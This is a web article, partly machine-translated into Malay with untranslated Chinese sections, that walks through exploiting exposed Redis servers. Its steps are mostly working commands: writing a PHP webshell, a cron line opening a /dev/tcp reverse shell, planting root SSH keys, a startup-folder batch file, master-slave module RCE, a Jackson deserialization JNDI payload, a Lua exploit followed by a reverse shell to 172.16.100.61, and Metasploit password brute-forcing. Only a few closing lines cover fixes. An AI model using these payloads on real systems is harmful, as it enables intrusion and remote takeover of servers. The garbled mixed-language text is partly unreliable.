Rumah > pangkalan data > Redis > Contoh analisis eksploitasi kerentanan Redis

Contoh analisis eksploitasi kerentanan Redis

PHPz
Lepaskan: 2023-05-28 20:08:19
ke hadapan
1789 orang telah melayarinya

1. Kata Pengantar

Kerentanan berkaitan redis telah wujud sejak sekian lama, dan masih terdapat senario yang boleh dieksploitasi Kali ini, kami akan meringkaskan dan mengeluarkan semula eksploitasi kerentanan yang berkaitan dengan redis supaya kami boleh mewujudkan idea eksploitasi dengan cepat apabila menghadapinya pada masa hadapan.

2. Pengenalan kepada redis

Redis ialah sistem storan nilai kunci. Sama seperti Memcached, ia menyokong jenis nilai yang lebih tersimpan, termasuk rentetan (rentetan), senarai (senarai terpaut), set (**), zset (set diisih -- dipesan **) dan cincang (jenis cincang) .
Redis sebahagian besarnya mengimbangi kekurangan storan kunci/nilai seperti memcached, dan boleh memainkan peranan tambahan yang sangat baik kepada pangkalan data hubungan dalam sesetengah situasi. Ia menyediakan Java, C/C++, C#, PHP, JavaScript, Perl, Object-C, Python, Ruby, Erlang dan pelanggan lain, yang sangat mudah digunakan.
Redis menyokong penyegerakan tuan-hamba. Data boleh disegerakkan daripada pelayan induk kepada sebarang bilangan pelayan hamba, dan pelayan hamba boleh menjadi pelayan induk yang dikaitkan dengan pelayan hamba yang lain.
Port lalai: 6379

3. Persediaan persekitaran

Bina persekitaran ujian untuk windows dan linux.
Versi Windows rasmi terbaharu redis ialah 3.x.
Alamat muat turun Windows:
https://github.com/microsoftarchive/redis/releases
Muat turun Redis-x64-3.2.100.zip dan ekstrak ke direktori tempatan.

Contoh analisis eksploitasi kerentanan Redis

Ubah suai fail konfigurasi redis.windows.conf, dayakan akses jauh dan matikan mod dilindungi.
Ubah suai bind 127.0.0.1 untuk mengikat 0.0.0.0
Ubah suai mod terlindung ya kepada tidak mod terlindung

Contoh analisis eksploitasi kerentanan Redis

Nyatakan fail konfigurasi redis.windows.conf , Mulakan perkhidmatan redis.

redis-server.exe  redis.windows.conf
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

Gunakan redis-cli.exe untuk berjaya menyambung ke perkhidmatan redis.

Contoh analisis eksploitasi kerentanan Redis

alamat muat turun linux:
Versi terkini ialah 6.0.1, anda boleh memilih versi yang perlu anda muat turun.
http://download.redis.io/releases/redis-6.0.1.tar.gz
Gunakan arahan wget untuk memuat turun

$ wget http://download.redis.io/releases/redis-6.0.1.tar.gz
$ tar xzf redis-6.0.1.tar.gz
$ cd redis-6.0.1$ make
Salin selepas log masuk

Selepas penyusunan, masukkan direktori src dan tambah redis- pelayan dan Salin redis-cli ke direktori /usr/bin

cp redis-server /usr/bin
cp redis-cli /usr/bin
cd ../
ls
cp redis.conf /etc/
Salin selepas log masuk

Ubah suai redis.conf supaya sama dengan konfigurasi dalam tingkap, dayakan akses luaran dan matikan mod dilindungi.

Contoh analisis eksploitasi kerentanan Redis

Mulakan perkhidmatan redis

redis-server  /etc/redis.conf
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

Berjaya disambungkan ke perkhidmatan redis.

redis-cli -h 172.16.86.136
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

4. Redis menulis fail

redis tidak menetapkan kata laluan secara lalai Jika tiada sekatan akses IP ditetapkan, anda boleh menulis melalui redis Import fail untuk kegunaan yang berkaitan.

4.1. Tulis webshell

Skop yang berkenaan: versi windows dan linux.
Syarat penggunaan:
1. Sasaran wujud dalam direktori web
2 Laluan mutlak web yang diketahui
3 Kebenaran tulis wujud
Proses penggunaan:
Gunakan redis untuk tulis cangkerang web ke Dalam direktori web sasaran.

config set dir "C:/phpstudy_pro/WWW/web"
config set dbfilename info.php
set x "\r\n\r\n<?php  phpinfo();?>\r\n\r\n"
save
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

Jika pemisah baris tidak dilakukan, fail yang diimport oleh Redis mengandungi maklumat versi, yang mungkin mengakibatkan kegagalan untuk dilaksanakan. rnrn ialah simbol yang mewakili pemisah baris.

Contoh analisis eksploitasi kerentanan Redis

Fail telah berjaya ditulis.

Contoh analisis eksploitasi kerentanan Redis

4.2 Cangkang lantunan tugas berjadual

Skop penggunaan: centos
Syarat penggunaan:
1 Proses penggunaan:
Dengan kebenaran yang mencukupi, gunakan redis untuk menulis fail ke direktori tugas yang dijadualkan untuk dilaksanakan.
Dengar port dulu.

nc -lvp 8899
Salin selepas log masuk
Gunakan redis untuk menjana fail konfigurasi tugas berjadual.

config set dir /var/spool/cronset tide "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/x.x.x.x/8899 0>&1\n\n"config set dbfilename root
save
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

Tugas yang dijadualkan telah berjaya ditambahkan pada hos sasaran.

crontab -l
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

Laksanakan sekali setiap minit dan berjaya menerima cengkerang lantunan.

Contoh analisis eksploitasi kerentanan Redis

坑点:
使用kali做为目标主机进行测试,需要写入计划任务到/var/spool/cron/crontabs目录下。
发现当目标主机为centos时可以反弹shell成功,使用了ubuntu和debian均无法成功反弹shell。
原因:由于redis向任务计划文件里写内容出现乱码而导致的语法错误,而乱码是避免不了的,centos会忽略乱码去执行格式正确的任务计划。

4.3、写入公钥远程连接

使用范围:开启了密钥认证的linux主机
利用条件:
1、root权限
2、开启了ssh密钥登录,存在/etc/.ssh文件
利用过程:
当redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录目标服务器。
1、首先在centos靶机上开启ssh密钥登录。
修改/etc/ssh/sshd_config配置文件。

RSAAuthentication设置为yes,意思是设置开启使用RSA算法的基于rhosts的安全验证;
PubkeyAuthentication设置为yes,意思是设置开启公钥验证;
AuthorizedKeyFiles后面的目录,是你上传的公钥所保存的文件;
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

重启服务

 systemctl restart sshd.service
Salin selepas log masuk

2、生成密钥
在kali中使用自带的命令生成一对密钥。

ssh-keygen -t rsa
Salin selepas log masuk

3、将公钥内容导入key.txt文件

Contoh analisis eksploitasi kerentanan Redis

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

4、将生成的公钥内容设置给redis里的变量

cat /root/.ssh/key.txt | redis-cli -h x.x.x.x -x set tide
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

5、在 /root/.ssh 目录下生成authorized_keys文件。

redis-cli -h x.x.x.x
config set dir /root/.ssh 
config  set  dbfilename authorized_keys
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

成功写入authorized_keys文件。

Contoh analisis eksploitasi kerentanan Redis

6、使用本地的私钥连接ssh

ssh  -o StrictHostKeyChecking=no x.x.x.x
Salin selepas log masuk

连接成功。

Contoh analisis eksploitasi kerentanan Redis

坑点:
目标主机必须开启了密钥登录才能利用。
ssh第一次连接时要加上 -o StrictHostKeyChecking=no,不然可能一直连不上。

4.4、开机自启目录

当目标redis部署在windows主机上时,可以写入文件到自启动目录。当下次电脑重新启动时执行上线。
使用powershell远程下载执行。
server服务器默认存在Administrator用户。
写入批处理文件到Administrator用户的开机启动目录。

config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
config set dbfilename shell.bat
save
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

5、 redis主从同步rce

使用范围redis 4.x-5.0.5
在Redis 4.x之后,Redis新增了模块功能,通过外部拓展,可以在redis中实现一个新的Redis命令,通过写c语言并编译出.so文件。

git clone https://github.com/Ridter/redis-rce.gitgit clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
Salin selepas log masuk

编译so文件

cd RedisModules-ExecuteCommand/
ls
make
Salin selepas log masuk

编译完后之后module.so到redis-rce目录下,运行命令:

python redis-rce.py -r x.x.x.x  -L x.x.x.x -f module.so
Salin selepas log masuk

-r参数是指目标redis IP地址
-L参数是指本机的ip地址
执行命令后,本机21000端口生成一个redis服务,然后目标redis指定本机为主服务器,同步执行so文件。
执行成功后可以选择生成一个交互的shell,或者重新反弹一个shell。

Contoh analisis eksploitasi kerentanan Redis

6、反序列化rce

当遇到 redis 服务器写文件无法 getshell,可以查看redis数据是否符合序列化数据的特征。
序列化数据类型分辨:

jackson:关注 json 对象是不是数组,第一个元素看起来像不像类名,例如["com.blue.bean.User",xxx]
fastjson:关注有没有 @type 字段
jdk:首先看 value 是不是 base64,如果是解码后看里面有没有 java 包名
Salin selepas log masuk

redis 反序列化本质上不是 redis 的漏洞,而是使用 redis 的应用反序列化了 redis 的数据而引起的漏洞,redis 是一个缓存服务器,用于存储一些缓存对象,所以在很多场景下 redis 里存储的都是各种序列化后的对象数据。
两个常见场景:
一、java 程序要将用户登录后的 session 对象序列化缓存起来,这种场景是最常见的。
二、程序员经常会把 redis 和 ORM 框架整合起来,一些频繁被查询的数据就会被序列化存储到 redis 里,在被查询时就会优先从 redis 里将对象反序列化一遍。

redis一般存储的都是 java 序列化对象,php、python 比较少见,比较多的是 fastjson 和 jackson 类型的序列化数据,jdk 原生的序列化数据。
因为要从 redis 反序列化对象,在对象类型非单一或少量的情况下程序员通常会选择开启 jackson 的 defaulttyping 和 fastjson 的 autotype,所以通常可以进行利用。

fastjson反序列化和java反序列化和jackson 反序列化利用原理相同,都是通过篡改 redis 里面的反序列化数据,把恶意的序列化字节码存储进去,等到应用使用到它的时候就会反序列化触发漏洞,下面演示jackson 反序列化的利用过程。

6.1、jackson 反序列化利用

序列化:把Java对象转换为字节序列的过程。
反序列化:把字节序列恢复为Java对象的过程。
jackson 反序列化漏洞汇总
使用浅蓝大佬的springboot+redis+jackson的漏洞环境进行演示。
下载地址:https://github.com/iSafeBlue/redis-rce
首先搭建漏洞环境。
使用IDEA打开pom.xml文件,自动下载安装程序运行所需的依赖。

Contoh analisis eksploitasi kerentanan Redis

安装完成后,运行程序。

Contoh analisis eksploitasi kerentanan Redis本地启动一个redis。

Contoh analisis eksploitasi kerentanan Redis

TestController.java 里写了两个接口,login 接口会把 User 对象直接存储到 redis。Home API will query Redis using the username parameter as the key.。

在“存储”和“查询”的时候实际上就是在“序列化”与“反序列化”。

这个过程如下:

调用login接口 -> 序列化User对象并存储到redis -> 调用home接口 -> 从redis取出数据并反序列化

如果控制了redis,可以先调用login接口把User 对象序列化存储到redis,然后把redis里的这条序列化数据篡改成恶意反序列化数据。最后,访问home接口时,从redis中获取数据导致了反序列化漏洞的触发。

演示过程:
访问login接口把数据存储到redis。

127.0.0.1:8080/login?username=nuoyan&password=123456
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

修改redis中的存储的数据为恶意反序列化数据,发起 JNDI 连接请求。相关rmi和jndi服务器搭建可以参考

Fastjson反序列化漏洞利用

set nuoyan "[\"com.zaxxer.hikari.HikariConfig\",{\"metricRegistry\":\"rmi://x.x.x.x:1098/jndi\"}]"
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

然后访问home接口,取出数据进行反序列化,成功弹出了计算器。

http://127.0.0.1:8080/home?username=nuoyan
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

7、lua rce

A-Team团队大佬提出的一种利用方法。相关细节可参考《在Redis中构建Lua虚拟机的稳定攻击路径》
适用于高权限运行低版本redis的lua虚拟机,写文件失败时进行尝试。
本地搭建了centos6.5+redis 2.6.16的实验环境
使用info server 和 eval "return _VERSION" 0 命令可以查看当前redis版本和编译信息。

Contoh analisis eksploitasi kerentanan Redis

下载A-Team团队的exp

https://github.com/QAX-A-Team/redis_lua_exploit/

修改redis_lua.py中目标地址为靶机的ip地址。

Contoh analisis eksploitasi kerentanan Redis

运行攻击exp。

Contoh analisis eksploitasi kerentanan Redis

显示执行成功,可以进行命令执行了。

连接靶机redis执行反弹shell命令。

eval "tonumber('/bin/bash -i >& /dev/tcp/172.16.100.61/9999 0>&1', 8)" 0
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

成功接收到反弹的shell。

Contoh analisis eksploitasi kerentanan Redis

8、redis密码爆破

当redis服务开放且设置了密码时,可以尝试使用工具爆破。
首先给redis设置密码,修改redis.conf,增加密码

requirepass admin@123
Salin selepas log masuk

Contoh analisis eksploitasi kerentanan Redis

使用redis-cli连接,使用-a参数指定密码操作。

Contoh analisis eksploitasi kerentanan Redis

使用msf的auxiliary/scanner/redis/redis_login模块
设置爆破的目标地址,和字典文件,不建议使用默认字典文件。

Contoh analisis eksploitasi kerentanan Redis

成功爆破出密码为admin@123

Contoh analisis eksploitasi kerentanan Redis

9. Pembetulan kerentanan

1. Dilarang menggunakan keistimewaan root untuk memulakan perkhidmatan redis.
2. Mulakan pengesahan kata laluan untuk akses redis.
3. Tambahkan sekatan akses IP dan tukar port 6379 lalai

Atas ialah kandungan terperinci Contoh analisis eksploitasi kerentanan Redis. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Label berkaitan:
sumber:yisu.com
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan